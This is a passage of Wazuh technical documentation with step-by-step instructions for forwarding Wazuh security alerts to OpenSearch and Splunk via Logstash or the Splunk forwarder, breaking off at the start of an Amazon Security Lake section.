  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh indexes and send them to OpenSearch.

The Logstash pipeline requires access to the following secret values:

  • Wazuh indexer credentials

  • OpenSearch credentials

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of the Wazuh indexer and OpenSearch in the Logstash keystore.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    OPENSEARCH_USERNAME, OPENSEARCH_PASSWORD, WAZUH_INDEXER_USERNAME, and WAZUH_INDEXER_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your OpenSearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_PASSWORD
      
    3. Store your Wazuh indexer administrator username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_PASSWORD
      

    Where:

    • OPENSEARCH_USERNAME and OPENSEARCH_PASSWORD are keys representing your OpenSearch username and password respectively.

    • WAZUH_INDEXER_USERNAME and WAZUH_INDEXER_PASSWORD are keys representing your Wazuh indexer administrator username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-opensearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-opensearch.conf
      
    2. Add the following configuration to the wazuh-opensearch.conf file. This sets the parameters required to run Logstash.

      input {
        opensearch {
         hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
         user  =>  "${WAZUH_INDEXER_USERNAME}"
         password  =>  "${WAZUH_INDEXER_PASSWORD}"
         index =>  "wazuh-alerts-4.x-*"
         ssl => true
         ca_file => "</PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem"
         query =>  '{
             "query": {
                "range": {
                   "@timestamp": {
                      "gt": "now-1m"
                   }
                }
             }
         }'
         schedule => "* * * * *"
        }
      }
      
      output {
          opensearch {
            hosts => ["<OPENSEARCH_ADDRESS>"]
            auth_type => {
               type => 'basic'
               user => '${OPENSEARCH_USERNAME}'
               password => '${OPENSEARCH_PASSWORD}'
            }
            index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
            cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem"
            ssl => true
            template => "/etc/logstash/templates/wazuh.json"
            template_name => "wazuh"
            template_overwrite => true
            legacy_template => false
          }
      }
      

      Where:

      • <WAZUH_INDEXER_ADDRESS> is your Wazuh indexer address or addresses in case of cluster deployment.

      • <OPENSEARCH_ADDRESS> is your OpenSearch address.

      • </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem is your Wazuh indexer certificate local path on the Logstash server. For example, you can use /etc/logstash/wazuh-indexer-certs/root-ca.pem which is the Wazuh indexer root certificate that was copied earlier.

      • </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem is your OpenSearch certificate local path on the Logstash server. For example, you can use /etc/logstash/opensearch-certs/root-ca.pem which is the OpenSearch certificate that was copied earlier.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem" with ssl_certificate_verification => false.

      If you aren't using composable index templates and the _index_template API, remove the legacy_template => false parameter.
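Optionally, you can ask Logstash to validate the pipeline configuration and exit without starting it, using the same paths as in this guide:

$ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-opensearch.conf --path.settings /etc/logstash/ --config.test_and_exit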

Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-opensearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the Logstash executable, the pipeline, and the configuration files.

    Ensure that Wazuh indexer RESTful API port (9200) is open on your Wazuh indexer. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete will not be forwarded to the OpenSearch indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events produced when Logstash runs. View this file in case you need to troubleshoot.

After Logstash is successfully running, check how to configure the Wazuh alert index pattern and verify the integration.
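As an additional check from the command line, counting the documents that reached OpenSearch shows whether alerts are flowing. The example below uses the certificate path from this guide and assumes the default REST API port 9200; replace the address and credentials with your own:

$ curl -s --cacert /etc/logstash/opensearch-certs/root-ca.pem \
    -u <OPENSEARCH_USERNAME>:<OPENSEARCH_PASSWORD> \
    "https://<OPENSEARCH_ADDRESS>:9200/wazuh-alerts-4.x-*/_count?pretty"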

Wazuh server integration using Logstash

Perform all the steps below on your Wazuh server. Learn more about the Wazuh server integration and its necessary considerations.

Installing Logstash

We use Logstash to forward security data in the /var/ossec/logs/alerts/alerts.json alerts file from the Wazuh server to the OpenSearch indexes.

Perform the following steps to install Logstash and the required plugin.

  1. Follow the Elastic documentation to install Logstash on the Wazuh server.

  2. Run the following command to install the logstash-output-opensearch plugin. This plugin allows Logstash to write the data into OpenSearch.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-output-opensearch
    
  3. Copy the OpenSearch root certificate to the Wazuh server. You can add the certificate to any directory of your choice. In our case, we add it in the /etc/logstash/opensearch-certs directory.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem with your OpenSearch certificate local path on the Wazuh server.

Configuring new indexes

You must define the mappings between the data and the index types to ensure OpenSearch indexes your data correctly. OpenSearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure OpenSearch indexes the data correctly.

You need to use the logstash/os_template.json template to configure this index initialization for your OpenSearch platform. The refresh_interval is set to 5s in the template we provide.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

# mkdir /etc/logstash/templates
# curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-template.json

In OpenSearch, indexes support up to 1000 fields by default. However, Wazuh logs can contain more fields than this. To solve this issue, the provided wazuh.json template raises the total fields limit to 10000, as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data in the Wazuh /var/ossec/logs/alerts/alerts.json alerts file and send them to OpenSearch.

The Logstash pipeline requires access to your OpenSearch credentials.

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of OpenSearch.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    OPENSEARCH_USERNAME and OPENSEARCH_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your OpenSearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add OPENSEARCH_PASSWORD
      

      Where OPENSEARCH_USERNAME and OPENSEARCH_PASSWORD are keys representing your OpenSearch username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-opensearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-opensearch.conf
      
    2. Add the following configuration to the wazuh-opensearch.conf file. This sets the parameters required to run Logstash.

      input {
        file {
          id => "wazuh_alerts"
          codec => "json"
          start_position => "beginning"
          stat_interval => "1 second"
          path => "/var/ossec/logs/alerts/alerts.json"
          mode => "tail"
          ecs_compatibility => "disabled"
        }
      }
      
      output {
          opensearch {
            hosts => ["<OPENSEARCH_ADDRESS>"]
            auth_type => {
               type => 'basic'
               user => '${OPENSEARCH_USERNAME}'
               password => '${OPENSEARCH_PASSWORD}'
            }
            index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
            cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem"
            ssl => true
            template => "/etc/logstash/templates/wazuh.json"
            template_name => "wazuh"
            template_overwrite => true
            legacy_template => false
          }
      }
      

      Where:

      • <OPENSEARCH_ADDRESS> is your OpenSearch IP address.

      • </PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem is your OpenSearch certificate local path on the Wazuh server. In our case, we used /etc/logstash/opensearch-certs/root-ca.pem.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/OPENSEARCH/CERTIFICATE>/root-ca.pem" with ssl_certificate_verification => false.

      If you aren't using composable index templates and the _index_template API, remove the legacy_template => false parameter.

  4. By default the /var/ossec/logs/alerts/alerts.json file is owned by the wazuh user with restrictive permissions. You must add the logstash user to the wazuh group so it can read the file when running Logstash as a service:

    $ sudo usermod -a -G wazuh logstash
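
    With the group membership in place, you can optionally confirm that the logstash user can read the alerts file; the following should print the first alert in JSON format:

    $ sudo -u logstash head -n 1 /var/ossec/logs/alerts/alerts.json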
    
Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-opensearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the configuration files.

    Ensure that Wazuh server RESTful API port (55000) is open on your Wazuh server. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Note

Any data indexed before the configuration is complete will not be forwarded to the OpenSearch indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events generated when Logstash runs. View this file in case you need to troubleshoot.

Check Elastic documentation for more details on setting up and running Logstash.

Configuring the Wazuh alerts index pattern in OpenSearch

In OpenSearch Dashboards, do the following to create the index pattern name for the Wazuh alerts.

  1. Open the menu and select Management > Dashboards Management.

  2. Choose Index Patterns and select Create index pattern.

  3. Define wazuh-alerts-* as the index pattern name.

  4. Select timestamp as the primary time field for use with the global time filter. Then Create the index pattern.

  5. Open the menu and select Discover under OpenSearch Dashboards.

Verifying the integration

To check the integration with OpenSearch, navigate to Discover in OpenSearch Dashboards and verify that you can find the Wazuh security data within the index pattern wazuh-alerts-* you created.

OpenSearch dashboards

Wazuh provides several dashboards for OpenSearch. After finishing with the OpenSearch integration setup, these dashboards display your Wazuh alerts in OpenSearch.

Importing these dashboards defines the index pattern name wazuh-alerts-*. The index pattern name is necessary for creating index names and receiving alerts.

Follow the next steps to import the Wazuh dashboards for OpenSearch.

  1. Run the command below to download the Wazuh dashboard file for OpenSearch.

    1. If you are accessing the OpenSearch dashboard from a Linux or macOS system:

      # wget https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-dashboards.ndjson
      
    2. If you are accessing the OpenSearch dashboard from a Windows system, run the following command in PowerShell:

      Invoke-WebRequest -Uri "https://packages.wazuh.com/integrations/opensearch/4.x-2.x/dashboards/wz-os-4.x-2.x-dashboards.ndjson" -OutFile "allDashboards.ndjson"
      
  2. In OpenSearch Dashboards, navigate to Management > Dashboards management.

  3. Click on Saved Objects and click Import.

  4. Click on the Import icon, browse your files, and select the dashboard file.

  5. Click the Import button to start importing then click Done.

  6. To find the imported dashboards, navigate to Dashboard under OpenSearch Dashboards.

Splunk integration

Splunk is a security platform that enables you to collect, search, analyze, visualize, and report real-time and historical data. Splunk indexes the data stream and parses it into a series of individual events that you can view and search.

Splunk users connect to Splunk through the command-line interface or through Splunk Web to administer their deployment. Users can also manage and create knowledge objects, run searches, and create pivots and reports.

Wazuh integrates with Splunk in these ways:

Wazuh indexer integration using Logstash

Before configuring Logstash, you need to set up the Splunk indexer to receive the forwarded events. Learn more about the Wazuh indexer integration and its necessary considerations.

Configuring the Splunk indexer

To complete the integration from the Wazuh indexer to Splunk, you must first configure Splunk to:

  • Enable the HTTP Event Collector.

  • Define the wazuh-alerts Splunk index to store your logs.

  • Create your Event Collector token.

Check the Splunk set up and use HTTP Event Collector documentation for instructions on completing this configuration.
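Once the token is created, you can optionally verify that the HTTP Event Collector accepts events before configuring Logstash. The check below assumes the default HEC port 8088 and uses the same <SPLUNK_URL> placeholder as the pipeline configuration later in this section; replace <SPLUNK_EVENT_COLLECTOR_TOKEN> with your token. The -k flag skips certificate verification and is intended for testing only.

$ curl -k "<SPLUNK_URL>:8088/services/collector/event" \
    -H "Authorization: Splunk <SPLUNK_EVENT_COLLECTOR_TOKEN>" \
    -d '{"event": "Wazuh HEC connectivity test"}'

A successful request typically returns {"text":"Success","code":0}.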

Installing Logstash

You must install Logstash on a dedicated server or on the server hosting the third-party indexer.

Perform the following steps on your Logstash server to set up your forwarder.

  1. Follow the Elastic documentation to install Logstash. Ensure that you consider the requirements and performance tuning guidelines for running Logstash.

  2. Run the following command to install the logstash-input-opensearch plugin. This plugin reads data from the Wazuh indexer into the Logstash pipeline.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
    
  3. Copy the Wazuh indexer and Splunk root certificates to the Logstash server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/wazuh-indexer-certs and /etc/logstash/splunk-certs respectively.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem
    $ sudo chmod -R 755 </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem
    

    Replace </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem and </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem with your Wazuh indexer and Splunk certificate local paths on the Logstash endpoint respectively.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh indexes and send them to Splunk.

The Logstash pipeline requires access to the following secret values:

  • Wazuh indexer credentials

  • Splunk Event Collector token

To securely store these values, you can use the Logstash keystore.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"' | sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store these values. When prompted, input your own values as follows:

    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_USERNAME
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_PASSWORD
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add SPLUNK_AUTH
    

    Where:

    • WAZUH_INDEXER_USERNAME and WAZUH_INDEXER_PASSWORD are keys representing your Wazuh indexer administrator username and password respectively.

    • SPLUNK_AUTH is your Splunk Event Collector token.

Perform the following steps to configure the Logstash pipeline.

  1. Create the configuration file wazuh-splunk.conf in /etc/logstash/conf.d/ directory.

    $ sudo touch /etc/logstash/conf.d/wazuh-splunk.conf
    
  2. Edit the file and add the following configuration. This sets the parameters required to run Logstash.

    input {
      opensearch {
       hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
       user  =>  "${WAZUH_INDEXER_USERNAME}"
       password  =>  "${WAZUH_INDEXER_PASSWORD}"
       index =>  "wazuh-alerts-4.x-*"
       ssl => true
       ca_file => "</PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem"
       query =>  '{
           "query": {
              "range": {
                 "@timestamp": {
                    "gt": "now-1m"
                 }
              }
           }
       }'
       schedule => "* * * * *"
      }
    }
    output {
       http {
          format => "json" # format of forwarded logs
          http_method => "post" # HTTP method used to forward logs
          url => "<SPLUNK_URL>:8088/services/collector/raw" # endpoint to forward logs to
          headers => ["Authorization", "Splunk ${SPLUNK_AUTH}"]
          cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem"
       }
    }
    

    Where:

    • <WAZUH_INDEXER_ADDRESS> is your Wazuh indexer address or addresses in case of cluster deployment.

    • <SPLUNK_URL> is your Splunk URL.

    • </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem is your Wazuh indexer certificate local path on the Logstash server. In our case we used /etc/logstash/wazuh-indexer-certs/root-ca.pem.

    • </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem is your Splunk certificate local path on the Logstash server. In our case, we used /etc/logstash/splunk-certs/ca.pem.

    Note

    For testing purposes, you can avoid SSL verification by replacing the line cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem" with ssl_verification_mode => "none".

Running Logstash
  1. Once you have everything set, start Logstash from the command line with its configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-splunk.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the settings files.

    Ensure that Wazuh indexer RESTful API port (9200) is open on your Wazuh indexer. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete will not be forwarded to the Splunk indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance has logs that you can check in case something fails.

After Logstash is successfully running, check how to verify the integration.

Wazuh server integration using Logstash

Before configuring Logstash, you need to set up the Splunk indexer to receive the forwarded events. Learn more about the Wazuh server integration and its necessary considerations.

Configuring Splunk indexer

First, set up Splunk as follows:

  • Enable HTTP Event Collector.

  • Define the wazuh-alerts Splunk index to store your logs.

  • Create your Event Collector token.

Check the Splunk set up and use HTTP Event Collector documentation to achieve this.

Installing Logstash

Logstash must forward the data from the Wazuh server to the Splunk indexes created previously.

  1. Follow the Elastic documentation to install Logstash on the same system as the Wazuh server.

  2. Copy the Splunk root certificates to the Wazuh server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/splunk-certs.

  3. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem
    

    Replace </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem with your Splunk certificate local path on the Wazuh server.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data in the Wazuh /var/ossec/logs/alerts/alerts.json alerts file and send them to Splunk.

The Logstash pipeline requires access to your Splunk Event Collector Token.

To securely store these values, you can use the Logstash keystore.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store these values. When prompted, input your own values. Where SPLUNK_AUTH is your Splunk Event Collector token.

    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
    $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add SPLUNK_AUTH
    

The pipeline uses the file input plugin in tail mode with the JSON codec, which allows Logstash to read the Wazuh alerts file as new alerts are appended.

To configure the Logstash pipeline do the following.

  1. Create the configuration file wazuh-splunk.conf in the /etc/logstash/conf.d/ directory:

    $ sudo touch /etc/logstash/conf.d/wazuh-splunk.conf
    
  2. Edit the wazuh-splunk.conf file and add the following configuration. This sets the parameters required to run Logstash.

    input {
      file {
        id => "wazuh_alerts"
        codec => "json"
        start_position => "beginning"
        stat_interval => "1 second"
        path => "/var/ossec/logs/alerts/alerts.json"
        mode => "tail"
        ecs_compatibility => "disabled"
      }
    }
    output {
       http {
          format => "json" # format of forwarded logs
          http_method => "post" # HTTP method used to forward logs
          url => "<SPLUNK_URL>:8088/services/collector/raw" # endpoint to forward logs to
          headers => ["Authorization", "Splunk ${SPLUNK_AUTH}"]
          cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem"
       }
    }
    

    Where:

    • <SPLUNK_URL> is your Splunk URL.

    • </PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem is your Splunk certificate local path on the Wazuh server. In our case we used /etc/logstash/splunk-certs/ca.pem.

    Note

    For testing purposes, you can avoid SSL verification by replacing the line cacert => "</PATH/TO/LOCAL/SPLUNK/CERTIFICATE>/ca.pem" with ssl_verification_mode => "none".

  3. By default, the /var/ossec/logs/alerts/alerts.json file is owned by the wazuh user with restrictive permissions. You must add the logstash user to the wazuh group so it can read the file when running Logstash as a service:

    $ sudo usermod -a -G wazuh logstash
    
Running Logstash
  1. Once you have everything set, start Logstash with its configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-splunk.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the settings files.

    Ensure that Wazuh server RESTful API port (55000) is open on your Wazuh server. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash
    $ sudo systemctl start logstash
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete will not be forwarded to the Splunk indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance has logs that you can check in case something fails.

After Logstash is successfully running, check how to verify the integration.

Wazuh server integration using the Splunk forwarder

Before configuring the Splunk forwarder, you need to configure the Splunk indexer to receive the forwarded events. For this, you need to perform the following tasks on your Splunk server instance:

  • Set a receiving port.

  • Create the wazuh-alerts Splunk indexes.

Configuring Splunk indexer
Configuring the receiving port

Perform the following actions in Splunk Web:

  1. Go to Settings > Forwarding and receiving.

  2. Under Receive data, click Add new.

  3. Enter 9997 in the Listen on this port input box and click Save.

Alternatively, you can configure the receiving port in the following way.

Edit /opt/splunk/etc/system/local/inputs.conf on the Splunk server to add the following configuration:

[splunktcp://9997]
connection_host = none

For more details, visit enable a receiver section in the Splunk documentation.

Configuring indexes

Perform the following actions to configure the wazuh-alerts indexes in Splunk Web.

  1. Go to Settings > Indexes > New Index.

  2. Enter wazuh-alerts in Index name and click Save.

Alternatively, you can add the following configuration to the /opt/splunk/etc/system/local/indexes.conf file on the Splunk server to create the indexes:

[wazuh-alerts]
coldPath = $SPLUNK_DB/wazuh/colddb
enableDataIntegrityControl = 1
enableTsidxReduction = 1
homePath = $SPLUNK_DB/wazuh/db
maxTotalDataSizeMB = 512000
thawedPath = $SPLUNK_DB/wazuh/thaweddb
timePeriodInSecBeforeTsidxReduction = 15552000
tsidxReductionCheckPeriodInSec =
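
Whichever method you use, you can optionally confirm that the index exists through the Splunk REST API. This assumes the default management port 8089 and an administrator account:

$ curl -k -u admin:<SPLUNK_ADMIN_PASSWORD> "https://<SPLUNK_INDEXER_ADDRESS>:8089/services/data/indexes/wazuh-alerts"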
Installing Splunk forwarder on the Wazuh server

The Splunk forwarder must stream the data from the Wazuh server to the Splunk indexes created previously.

Follow the Splunk documentation to install the Splunk universal forwarder on the Wazuh Server.

Note

In Cloud instances, you need to configure the credentials for the Splunk forwarder. Check the configure the Splunk Cloud Platform universal forwarder credentials package documentation to learn how to do this.

Configuring the Splunk forwarder
  1. Set the following configuration in /opt/splunkforwarder/etc/system/local/inputs.conf file. This configures the Splunk forwarder to monitor the Wazuh /var/ossec/logs/alerts/alerts.json alerts file. Where <WAZUH_SERVER_HOST> is a name of your choice.

    [monitor:///var/ossec/logs/alerts/alerts.json]
    disabled = 0
    host = <WAZUH_SERVER_HOST>
    index = wazuh-alerts
    sourcetype = wazuh-alerts
    
  2. Set the following configuration in the /opt/splunkforwarder/etc/system/local/props.conf file to parse the data forwarded to Splunk:

    [wazuh-alerts]
    DATETIME_CONFIG =
    INDEXED_EXTRACTIONS = json
    KV_MODE = none
    NO_BINARY_CHECK = true
    category = Application
    disabled = false
    pulldown_type = true
    
  3. Set the following configuration in the /opt/splunkforwarder/etc/system/local/outputs.conf file to define how the alerts are forwarded to Splunk. Where <SPLUNK_INDEXER_ADDRESS> is your Splunk server IP address. For Cloud instances, the Splunk indexer address is the cloud instance address.

    [tcpout]
    defaultGroup = default-autolb-group
    
    [tcpout:default-autolb-group]
    server = <SPLUNK_INDEXER_ADDRESS>:9997
    
    [tcpout-server://<SPLUNK_INDEXER_ADDRESS>:9997]
    
Running the forwarder
  1. Start the Splunk Forwarder following Splunk documentation.

  2. Run the following command to verify the connection is established:

    $ sudo /opt/splunkforwarder/bin/splunk list forward-server
    
    Active forwards:
         <SPLUNK_INDEXER_ADDRESS>:9997
    Configured but inactive forwards:
         None
    

Note

The /opt/splunkforwarder/var/log/splunk/splunkd.log file in the forwarder instance has logs that you can check in case something fails.

Verifying the integration

To check the integration with Splunk, access Splunk Web and search for the wazuh-alerts Splunk index as follows.

  1. Go to Search & Reporting.

  2. Enter index="wazuh-alerts" and run the search.

Splunk dashboards

Wazuh provides several dashboards for Splunk.

After you complete the Splunk integration, you can use these dashboards to display your Wazuh alerts in Splunk.

To import the Wazuh dashboards for Splunk, repeat the following steps for each dashboard file you want to use.

  1. Download the dashboard file that you need from the list of Splunk dashboards provided above.

  2. Navigate to Search & Reporting in Splunk Web.

  3. Click Dashboards and click Create New Dashboard.

  4. Enter a dashboard title and select Dashboard Studio.

    Note

    The dashboard title you enter here will be overwritten with the original title set in the dashboard template.

  5. Select Grid and click on Create.

  6. Click on the </> Source icon.

  7. Paste your dashboard file content, replacing everything in the source.

  8. Click Back and click Save.

Amazon Security Lake integration

Note

This document guides you through setting up Wazuh as a data source for AWS Security Lake. To configure Wazuh as a subscriber to Amazon Security Lake, refer to Wazuh as a subscriber.

Wazuh security events can be converted to OCSF events and Parquet format, as required by Amazon Security Lake, by using an AWS Lambda Python function, a Logstash instance, and an AWS S3 bucket.

A properly configured Logstash instance can send the Wazuh security events to an AWS S3 bucket, automatically invoking the AWS Lambda function that transforms and sends the events to the dedicated Amazon Security Lake S3 bucket.

The diagram below illustrates the process of converting Wazuh Security Events to OCSF events and to Parquet format for Amazon Security Lake.

Prerequisites
  • Amazon Security Lake is enabled.

  • At least one up and running Wazuh Indexer instance with populated wazuh-alerts-5.x-* indices.

  • A Logstash instance.

  • An S3 bucket to store raw events.

  • An AWS Lambda function, using the Python 3.12 runtime.

  • (Optional) An S3 bucket to store OCSF events, mapped from raw events.

AWS configuration
Enabling Amazon Security Lake

